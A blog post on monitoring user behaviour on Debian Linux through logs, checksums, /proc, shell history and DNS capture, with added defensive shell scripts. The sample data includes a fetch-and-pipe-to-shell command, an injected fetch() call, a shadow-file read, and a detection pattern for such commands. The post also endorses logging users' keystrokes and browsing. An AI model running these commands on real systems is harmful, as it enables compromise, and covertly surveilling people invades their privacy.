Friday, September 22, 2017

User behavior logging

In this blog post I describe some ways to examine a Linux system without any additional (third-party) programs or tools. There are many Linux distributions, but I focus primarily on Debian and Debian-based distributions. By collecting all the available information it is possible to track and log user behaviour. The post consists of two parts: the default system logs, and other aspects of the system that can be monitored.

In this first part, the existing Linux system logs that matter most for user behaviour are listed and explained:

  • /var/log/messages - contains general system activity and non-critical messages such as user logins, kernel messages (including iptables packet logging) and so on. This file does not exist on Debian systems by default; /var/log/syslog is used instead.
  • /var/log/syslog - contains all messages except the authentication-related ones, which the default Debian rsyslog rules send elsewhere. Looking at a few systems, I found only kernel and thermald messages. Each line contains: date and time, hostname, the program that generated the message, its process ID in square brackets, and the message text.
  • /var/log/auth.log - contains system authorization information, including user logins through display and login managers, sudo requests, PAM authentication for cron jobs, the PolicyKit daemon, etc. This file is found on Debian; Red Hat-based distributions use /var/log/secure instead.
  • /var/log/btmp - keeps track of failed login attempts. It is a binary file in utmp format and is read with the lastb command (last reads the successful-login record /var/log/wtmp; last -f /var/log/btmp also works). It only records failures that go through PAM/utmp, so it is worth cross-checking with auth.log.
  • /var/log/dpkg.log and /var/log/yum.log - record package installs, upgrades and removals for dpkg (Debian) and yum (Red Hat) respectively; on Debian, /var/log/apt/history.log additionally records each apt invocation together with the user who ran it.
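As an added example (not part of the original post), the following script reduces auth.log-style lines to the facts a tracker cares about: failed SSH logins per source address, accepted logins, and the commands run or refused through sudo. The sample lines are constructed to match Debian's /var/log/auth.log format; point the functions at the real file instead (reading it needs membership of group adm or root).

```shell
#!/bin/sh
# Added example, not from the original post: summarise /var/log/auth.log.
# The sample below is constructed; the functions take any file in this format.

SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
Sep 22 10:01:12 debian sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Sep 22 10:01:15 debian sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Sep 22 10:01:40 debian sshd[1236]: Failed password for alice from 198.51.100.7 port 40110 ssh2
Sep 22 10:02:03 debian sshd[1240]: Accepted publickey for alice from 198.51.100.7 port 40112 ssh2
Sep 22 10:03:44 debian sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get install nmap
Sep 22 10:04:01 debian sudo:      bob : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/cat /etc/shadow
Sep 22 10:05:01 debian CRON[1301]: pam_unix(cron:session): session opened for user root by (uid=0)
EOF

# Failed SSH logins per source address, most frequent first. The address always
# follows the word "from", whether or not the line says "invalid user".
failed_ssh_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break }
         }
         END { for (a in n) print n[a], a }' "$1" | sort -rn
}

# Successful logins as "<user> <method> <ip>" from "Accepted <method> for <user> from <ip>".
accepted_logins() {
    awk '/sshd\[[0-9]+\]: Accepted/ { print $9, $7, $11 }' "$1"
}

# Commands actually run through sudo, as "<user> <command>".
sudo_commands() {
    sed -n '/NOT in sudoers/d; s/^.* sudo: *\([^ ]*\) : .*COMMAND=\(.*\)$/\1 \2/p' "$1"
}

# Commands sudo refused because the user is not in sudoers.
sudo_denied() {
    sed -n '/NOT in sudoers/ s/^.* sudo: *\([^ ]*\) : .*COMMAND=\(.*\)$/\1 \2/p' "$1"
}

echo "== failed ssh logins by address"; failed_ssh_by_ip "$SAMPLE"
echo "== accepted logins";              accepted_logins "$SAMPLE"
echo "== sudo commands";                sudo_commands "$SAMPLE"
echo "== sudo denied";                  sudo_denied "$SAMPLE"
```

The awk and sed patterns are anchored on the sshd and sudo message formats, which have been stable for years, but other PAM-using services (login, su, cron) write their own wording to the same file and need their own patterns.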

It is important to point out that not all Linux distributions have all of these logs enabled. With rsyslog, the default syslog daemon on Debian, /etc/rsyslog.conf is the main configuration file: it holds the global settings and the selector rules of the form facility.priority followed by a destination, which decide which messages go to which file (for example auth,authpriv.* to /var/log/auth.log), and it includes every /etc/rsyslog.d/*.conf fragment, where packages and administrators add further rules and outputs. The log files themselves land wherever those rules point, by convention under /var/log.

Log files can also be easily modified or deleted by anyone with write access to them. One mitigation is to mark them append-only with chattr +a, so that even the owning process can only add to them and cannot truncate, rewrite, rename or delete them. But root (any process with CAP_LINUX_IMMUTABLE) can simply clear the attribute again, and an attacker who gains root will do exactly that, so the better solution is to forward the logs in real time to another host, where a copy exists that the compromised machine cannot alter.
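The following is an added example (not from the original post) covering both the rsyslog rule layout described above and the remote-forwarding and append-only mitigations: it writes an /etc/rsyslog.d fragment that forwards everything to a central collector over TCP with a disk-backed queue, lists the selector rules in effect, and marks a log file append-only. The collector name loghost.example.net and the fragment name 90-forward.conf are assumptions; the functions take the directory as a parameter so they can be tried against a scratch directory before touching /etc.

```shell
#!/bin/sh
# Added example, not from the original post. Legacy rsyslog syntax is used
# because that is what the Debian default /etc/rsyslog.conf is written in.

# Write $1/90-forward.conf forwarding every message to host $2 on port $3
# (default 514). "@@" means TCP; a single "@" would be UDP, which silently
# drops messages when the collector is unreachable. The queue directives
# spool to disk while the collector is down instead of dropping.
write_forwarding_conf() {
    dir=$1; host=$2; port=${3:-514}
    cat > "$dir/90-forward.conf" <<EOF
# Forward all messages to the central log host; queue to disk while it is down.
\$ActionQueueType LinkedList
\$ActionQueueFileName fwdq
\$ActionQueueMaxDiskSpace 1g
\$ActionQueueSaveOnShutdown on
\$ActionResumeRetryCount -1
*.* @@${host}:${port}
EOF
}

# Print the selector -> destination rules in effect for a config tree rooted at
# $1 (rsyslog.conf plus rsyslog.d/*.conf). Lines starting with "$" are
# directives and "#" are comments; everything else is a rule.
active_rules() {
    cat "$1/rsyslog.conf" "$1"/rsyslog.d/*.conf 2>/dev/null |
        grep -Ev '^[[:space:]]*(#|\$|$)'
}

# Make a log file append-only and show the resulting attributes. Root can
# still run "chattr -a", and logrotate cannot rename the file while the
# attribute is set, which is why forwarding is the stronger control.
make_append_only() {
    chattr +a "$1" && lsattr "$1"
}

# Usage as root on the real system:
#   write_forwarding_conf /etc/rsyslog.d loghost.example.net
#   rsyslogd -N1 && systemctl restart rsyslog   # -N1 only validates the config
#   active_rules /etc
#   make_append_only /var/log/auth.log
```

For a production collector, forward over TLS (the rsyslog gtls driver) rather than plain TCP so a network-level attacker cannot read or inject log lines; the plain @@ form above is the minimum that survives a local compromise.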


Other ways for tracking user behavior

Integrity checking is another way to detect changes in the system: record checksums of the key files and compare them periodically with the stored values. MD5 and SHA-1 are the classic choices, but both have practical collision attacks, so use SHA-256 (sha256sum is part of coreutils). inotify works differently: it is a kernel facility that reports file and directory events (create, modify, attribute change, delete) as they happen, so a watcher such as inotifywait from the inotify-tools package does not need to rescan; it complements periodic checksumming rather than replacing it, since a watcher that is not running sees nothing. In both cases it is important to check metadata such as permissions and ownership, not just file contents, and to keep the baseline somewhere the monitored host cannot rewrite.

Besides monitoring logs for package installs, browser extensions are almost equally useful for tracking user behaviour. This can be done by checking the integrity of the directory where the browser stores extensions: for Google Chrome it is ~/.config/google-chrome/Default/Extensions/ (per profile, in the user's home directory), whereas the Debian-packaged Firefox add-ons live in /usr/lib/firefox-addons. Extensions a Firefox user installs themselves go into their profile, ~/.mozilla/firefox/<profile>/extensions/, so both locations need to be watched.
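As an added example (not from the original post) of the integrity checking just described, applied to a directory such as a browser's extension store: a baseline with one line per regular file holding its SHA-256, mode, owner, group and path, so that metadata-only changes show up as well as content changes. The scratch directory stands in for ~/.config/google-chrome/Default/Extensions/; stat -c and sha256sum are GNU coreutils, as on Debian.

```shell
#!/bin/sh
# Added example, not from the original post: a coreutils-only integrity baseline.

# Print the baseline for every regular file under $1, sorted so diffs are
# stable. File names containing newlines are not handled.
make_baseline() {
    find "$1" -type f -print | LC_ALL=C sort | while IFS= read -r f; do
        printf '%s %s %s\n' "$(sha256sum "$f" | cut -d' ' -f1)" \
                            "$(stat -c '%a %U %G' "$f")" "$f"
    done
}

# Compare the current state of $1 with baseline file $2. Prints nothing and
# returns 0 when nothing changed; otherwise prints a unified diff ("-" is the
# recorded state, "+" the current one) and returns 1.
check_baseline() {
    make_baseline "$1" > "$2.now"
    diff -u "$2" "$2.now"
}

# Constructed demo: baseline a scratch "extensions" directory, then tamper with it.
WATCH=$(mktemp -d); BASE=$(mktemp)
trap 'rm -rf "$WATCH" "$BASE" "$BASE.now"' EXIT
mkdir -p "$WATCH/abcdef/1.0"
printf '{"name":"example extension"}\n' > "$WATCH/abcdef/1.0/manifest.json"
printf 'console.log("hello")\n'         > "$WATCH/abcdef/1.0/background.js"
chmod 644 "$WATCH"/abcdef/1.0/*
make_baseline "$WATCH" > "$BASE"

printf 'fetch("http://203.0.113.5/")\n' >> "$WATCH/abcdef/1.0/background.js"  # content change
chmod 600 "$WATCH/abcdef/1.0/manifest.json"                                    # metadata-only change
check_baseline "$WATCH" "$BASE" || echo "integrity violation detected"
```

Run make_baseline from cron (or after each legitimate update) and store its output off the host, or at least under a path the watched user cannot write; a baseline kept next to the files it describes is as easy to rewrite as the files themselves.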

Running programs are easy to track and analyse because Linux exposes all process information through the virtual filesystem /proc. Each numeric directory inside /proc corresponds to a process ID, and a command such as ps ax matches processes to those IDs. Each of these directories contains the command-line arguments (cmdline), CPU and memory statistics (stat, statm), the current working directory (cwd), the environment variables (environ), symlinks to the executable (exe) and to the mapped libraries (maps), and the process status (status), including the real and effective user IDs. The exe and cwd links and environ are readable only by the process owner and root, and for a script exe points at the interpreter, not the script. /proc contains a lot more system information that can be analysed, such as filesystems, IDE devices, the memory map, I/O ports, general network information, parallel ports, partitions, general kernel parameters, network core settings and interrupts.
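As an added example (not from the original post), the script below reads the per-process facts straight from /proc without ps, and walks every process looking for two things a user-behaviour tracker would want flagged: an executable deleted after it started (the exe link then ends in " (deleted)", typical of a downloaded program that removes itself) and a process running from a world-writable directory. It needs Linux; for other users' processes the exe and cwd links are readable only by root.

```shell
#!/bin/sh
# Added example, not from the original post: process facts straight from /proc.

# One line for PID $1: pid, real uid, exe (symlink target), cwd and argv.
# cmdline is NUL-separated, so the NULs are turned into spaces.
proc_summary() {
    pid=$1
    [ -d "/proc/$pid" ] || return 1
    uid=$(awk '/^Uid:/ { print $2 }' "/proc/$pid/status")   # first column is the real uid
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')
    cmd=$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)
    printf 'pid=%s uid=%s exe=%s cwd=%s cmd=%s\n' "$pid" "$uid" "$exe" "$cwd" "$cmd"
}

# Walk every process and print the ones whose executable has been deleted or
# lives in a world-writable directory. Kernel threads (no exe link) and
# processes we may not inspect are skipped.
suspicious_processes() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        exe=$(readlink "$d/exe" 2>/dev/null) || continue
        case "$exe" in
            *" (deleted)"|/tmp/*|/var/tmp/*|/dev/shm/*) proc_summary "$pid" ;;
        esac
    done
    return 0
}

echo "== this shell";       proc_summary $$
echo "== suspicious";       suspicious_processes
```

A process whose exe is " (deleted)" is also what you see after a package upgrade replaced a binary that is still running, so treat it as a lead to check against dpkg.log, not as proof of compromise on its own.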

The keyboard is the device the user uses most, so it should be logged too (keypresses and typing speed). Shell commands are a sensitive part of every Unix system. They can be monitored in several ways; the simplest is the shell history. However, the history is under the user's control (it can be switched off with unset HISTFILE, skipped for a single command with a leading space when HISTCONTROL=ignorespace, or bypassed by starting a different shell), and there are far too many ways to execute a command on a Unix system to monitor them all this way; complete coverage needs kernel-level auditing of execve (auditd) or process accounting.
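As an added example (not from the original post) of monitoring commands through the shell history: with HISTTIMEFORMAT set, bash writes a "#<epoch>" line before each command in ~/.bash_history, and the script below turns such a file into a readable, time-stamped command log and picks out the commands a tracker would look at first. The sample history is constructed; the settings in the comment are the ones to put in /etc/bash.bashrc so every user's shell records timestamps and flushes after each command.

```shell
#!/bin/sh
# Added example, not from the original post: time-stamped bash history.
#
# Settings for /etc/bash.bashrc (or /etc/profile.d/history.sh):
#   export HISTTIMEFORMAT='%F %T '
#   export HISTSIZE=100000 HISTFILESIZE=100000
#   shopt -s histappend
#   export PROMPT_COMMAND='history -a'
# Making these readonly stops casual tampering, but nothing stops "unset
# HISTFILE", a leading space with HISTCONTROL=ignorespace, or another shell:
# history is a convenience log, not an audit trail.

SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
#1506074472
sudo apt-get install nmap
#1506074490
curl -s http://203.0.113.5/x.sh | sh
#1506074521
ls -la /var/log
EOF

# Print "YYYY-MM-DD HH:MM:SS command" in UTC for a history file with
# timestamps (date -d @epoch is GNU date). A command with no preceding
# "#epoch" line (written before HISTTIMEFORMAT was set) gets "?".
history_with_times() {
    ts='?'
    while IFS= read -r line; do
        case "$line" in
            '#'[0-9]*) ts=$(date -u -d "@${line#\#}" '+%Y-%m-%d %H:%M:%S') ;;
            *) printf '%s %s\n' "$ts" "$line"; ts='?' ;;
        esac
    done < "$1"
}

# Commands that elevate privileges or pipe downloaded content into a shell.
# A starting point only; extend the pattern for your environment.
risky_commands() {
    history_with_times "$1" | grep -E 'sudo |su |(curl|wget) .*\| *(ba)?sh'
}

echo "== history";  history_with_times "$SAMPLE"
echo "== risky";    risky_commands "$SAMPLE"
```

Note that the timestamp is written when the command is entered, and the whole history is only flushed to disk when the shell exits unless PROMPT_COMMAND runs history -a, which is why that setting matters for a tracker reading the file while the session is still open.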

Since most users visit the same websites daily, logging website visits is useful for determining user behaviour. This can be done with rndc querylog, which makes a BIND name server (the bind9 package on Debian) log every query it receives to its query log channel, or with tcpdump, filtering for DNS traffic only (port 53, UDP and TCP). Both only see plaintext DNS sent to a resolver you control; a client using DNS over TLS or HTTPS, or a resolver of its own choosing, will not appear.
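As an added example (not from the original post) of the tcpdump approach: capture DNS queries and reduce them to "client -> name" counts. tcpdump itself is not run here; the lines are constructed in its -n output format so the parser can be tried offline, and the interface name eth0 in the usage comment is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post: DNS queries per client from tcpdump.
# Live use: tcpdump -nn -l -i eth0 'port 53' | dns_queries_by_client -

SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
10:05:01.123456 IP 192.0.2.10.41234 > 192.0.2.1.53: 12345+ A? example.com. (29)
10:05:01.130021 IP 192.0.2.1.53 > 192.0.2.10.41234: 12345 1/0/0 A 93.184.216.34 (45)
10:05:07.004512 IP 192.0.2.10.41235 > 192.0.2.1.53: 12346+ [1au] AAAA? example.com. (40)
10:05:09.550000 IP 192.0.2.11.53000 > 192.0.2.1.53: 40001+ A? deb.debian.org. (32)
EOF

# Queries only: a field ending in "?" is the query type and the next field is
# the name, which skips responses and copes with the optional "[1au]" EDNS
# flag. The source port is stripped from the client address, then the
# "client name" pairs are counted, most frequent first. "$1" may be "-" for stdin.
dns_queries_by_client() {
    awk '$2 == "IP" && $4 == ">" {
            for (i = 6; i <= NF; i++) if ($i ~ /\?$/) {
                client = $3; sub(/\.[0-9]+$/, "", client)
                print client, $(i + 1); break
            }
         }' "$1" | sort | uniq -c | sort -rn
}

echo "== queries by client"; dns_queries_by_client "$SAMPLE"
```

Counting names rather than logging every packet is what makes the output useful over days: a name that appears once, at night, from a host that otherwise only talks to deb.debian.org is the kind of thing the "same websites daily" baseline exists to surface.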

Those are some of the ways to examine the state of a system and, from that, to try to track user behaviour. There are other parts of the system that are not mentioned, because I currently do not find them significant for the purpose of the system I am building.

